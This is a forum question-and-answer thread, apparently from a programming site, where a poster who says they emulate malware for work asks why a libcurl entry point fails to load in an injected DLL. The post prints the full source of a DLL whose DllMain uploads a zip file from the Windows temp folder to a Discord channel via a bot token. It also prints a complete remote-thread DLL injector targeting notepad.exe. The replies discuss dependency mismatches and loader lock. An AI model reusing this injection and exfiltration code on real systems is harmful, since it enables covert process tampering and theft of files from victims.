Weird error when injecting a DLL into a process - OSSL_QUIC_client_method could not be located in libcurl-4.dll
I have one of the weirdest problems I have ever encountered, and I can't find anything online about it.
For some context: I have to emulate malware for my job, and this currently is requiring me to perform process injection with a custom DLL. While this is fairly straight-forward, I have one function in particular that just does not want to work when used in a DLL format.
I have this DLL, which is supposed to make a curl post request to a remote Discord channel to upload a zip file:
new_curl.dll
#include <windows.h>
#include <curl/curl.h>
#include <string>

void SendFileToDiscord(const std::string& filepath, const std::string& channel_id, const std::string& bot_token) {
    CURL *curl;
    CURLcode res;
    struct curl_httppost *formpost = NULL;
    struct curl_httppost *lastptr = NULL;
    struct curl_slist *headerlist = NULL;

    curl_global_init(CURL_GLOBAL_ALL);

    curl_formadd(&formpost, &lastptr, 
                 CURLFORM_COPYNAME, "file",
                 CURLFORM_FILE, filepath.c_str(),
                 CURLFORM_END);

    curl = curl_easy_init();
    if(curl) {
        std::string url = "https://discord.com/api/v9/channels/" + channel_id + "/messages";
        std::string auth_header = "Authorization: Bot " + bot_token;

        headerlist = curl_slist_append(headerlist, auth_header.c_str());

        curl_easy_setopt(curl, CURLOPT_URL, url.c_str());
        curl_easy_setopt(curl, CURLOPT_HTTPPOST, formpost);
        curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headerlist);

        res = curl_easy_perform(curl);
        if(res != CURLE_OK)
            fprintf(stderr, "curl_easy_perform() failed: %s\n", curl_easy_strerror(res));

        curl_easy_cleanup(curl);
        curl_formfree(formpost);
        curl_slist_free_all(headerlist);
    }

    curl_global_cleanup();
}

extern "C" __declspec(dllexport) void InjectedFunction() {
    std::string filepath = "C:\\Windows\\Temp\\temp_files.zip";
    std::string bot_token = "--REDACTED--";
    std::string channel_id = "--REDACTED--";
    
    SendFileToDiscord(filepath, channel_id, bot_token);
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        InjectedFunction();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

//compile with
//g++ -shared -o curl.dll ./new_curl.cpp -lshlwapi -lgdi32 -lwininet -I /msys64/mingw64/include -L /msys64/mingw64/lib -lzip -I /msys64/mingw64/include -L /msys64/mingw64/lib -lcurl

The DLL compiles just fine, but when I execute the DLL by running injection.exe (code below), the DLL gives me this error message:

The procedure entry point OSSL_QUIC_client_method could not be located in the dynamic link library C:\msys64\ucrt64\bin\libcurl-4.dll

It's worth noting that I installed curl using the package manager provided by mingw, and the DLL is present in the path, as well as the local dir where the DLL is loaded. I also confirmed with Process Monitor that the DLL was found and loaded successfully.
injection.cpp
#include <windows.h>
#include <tlhelp32.h>
#include <iostream>
#include <tchar.h>
#include <tchar.h>
#include <wininet.h>
#include <iostream>
#include <fstream>
#include <string>
#include <vector>
#include <psapi.h>
#include <shlwapi.h>
#include <iostream>
#include <filesystem>
#include <fstream>

namespace fs = std::filesystem;

#define UNICODE


bool IsRunningAsAdmin() {
    BOOL fIsRunAsAdmin = FALSE;
    PSID pAdministratorsGroup = NULL;
    
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    if (!AllocateAndInitializeSid(
        &NtAuthority, 
        2, 
        SECURITY_BUILTIN_DOMAIN_RID, 
        DOMAIN_ALIAS_RID_ADMINS,
        0, 0, 0, 0, 0, 0,
        &pAdministratorsGroup)) {
        return false;
    }

    if (!CheckTokenMembership(NULL, pAdministratorsGroup, &fIsRunAsAdmin)) {
        fIsRunAsAdmin = FALSE;
    }

    if (pAdministratorsGroup) {
        FreeSid(pAdministratorsGroup);
        pAdministratorsGroup = NULL;
    }

    return fIsRunAsAdmin == TRUE;
}

DWORD GetTargetProcessId(const wchar_t* procName) {
    DWORD procId = 0;
    HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnap != INVALID_HANDLE_VALUE) {
        PROCESSENTRY32W pe32;
        pe32.dwSize = sizeof(pe32);
        if (Process32FirstW(hSnap, &pe32)) {
            do {
                if (!_wcsicmp(pe32.szExeFile, procName)) {
                    procId = pe32.th32ProcessID;
                    break;
                }
            } while (Process32NextW(hSnap, &pe32));
        }
        CloseHandle(hSnap);
    }
    return procId;
}

int main() {
    std::ofstream logfile("C:\\Windows\\Temp\\injection_log.txt", std::ios::app);
    logfile << "DLL injection beginning.\n";
    if (!IsRunningAsAdmin()) {
        MessageBoxW(NULL, L"This application requires administrative privileges.", L"Error", MB_OK | MB_ICONERROR);
        return 1;
    }
    const wchar_t* dllPath = L"C:\\Windows\\Temp\\dll\\curl.dll";
    const wchar_t* targetProcName = L"notepad.exe"; 

    DWORD procId = GetTargetProcessId(targetProcName);
    if (procId == 0) {
        logfile << L"Process not found.\n";
        return 1;
    }
    logfile << procId;
    logfile << "\n";

    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, procId);
    if (!hProc) {
        logfile << L"Failed to open target process.\n";
        return 1;
    }

    void* allocMem = VirtualAllocEx(hProc, NULL, (wcslen(dllPath) + 1) * sizeof(wchar_t), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (!allocMem) {
        logfile << L"Failed to allocate memory in target process.\n";
        CloseHandle(hProc);
        return 1;
    }

    if (!WriteProcessMemory(hProc, allocMem, dllPath, (wcslen(dllPath) + 1) * sizeof(wchar_t), NULL)) {
        logfile << L"Failed to write memory in target process.\n";
        VirtualFreeEx(hProc, allocMem, 0, MEM_RELEASE);
        CloseHandle(hProc);
        return 1;
    }

    HANDLE hThread = CreateRemoteThread(hProc, NULL, 0, (LPTHREAD_START_ROUTINE)LoadLibraryW, allocMem, 0, NULL);
    if (!hThread) {
        logfile << L"Failed to create remote thread. Error: " << GetLastError() << "\n";
        VirtualFreeEx(hProc, allocMem, 0, MEM_RELEASE);
        CloseHandle(hProc);
        return 1;
    }

    WaitForSingleObject(hThread, INFINITE);

    VirtualFreeEx(hProc, allocMem, 0, MEM_RELEASE);
    CloseHandle(hThread);
    CloseHandle(hProc);

    logfile << L"Code injection successful.\n";
    return 0;
}
//compile like this
//g++ .\injection.cpp -o .\injection.exe -mwindows -static-libgcc -static-libstdc++

I have compiled a similar version in an EXE format and it loads libcurl-4.dll without any problems and executes flawlessly.
Additionally, I have isolated the DLL, as you can see in the example, so I know it's not any other function or code interfering with it.
If there's no possible solution, let me know and I will retool the function to use the Windows API to make the connection, but if I could use curl for simplicity, that would be great.

what is really happens need look under debugger. also call InjectedFunction() from loader lock is error and can easy lead to deadlock

I'm guessing that you have multiple copies of libcurl-4.dll in your machine, where your DLL uses one that doesn't export OSSL_QUIC_client_method, and your EXE uses another one that does export OSSL_QUIC_client_method. Did you verify with procmon that both your EXE and DLL are loading the exact same dependent DLLs?

Yes same DLL is loaded from mingw64. ultimately I was never able to figure this out so I ended up just switching libraries and using the boost library instead and that seemed to fix my issues.
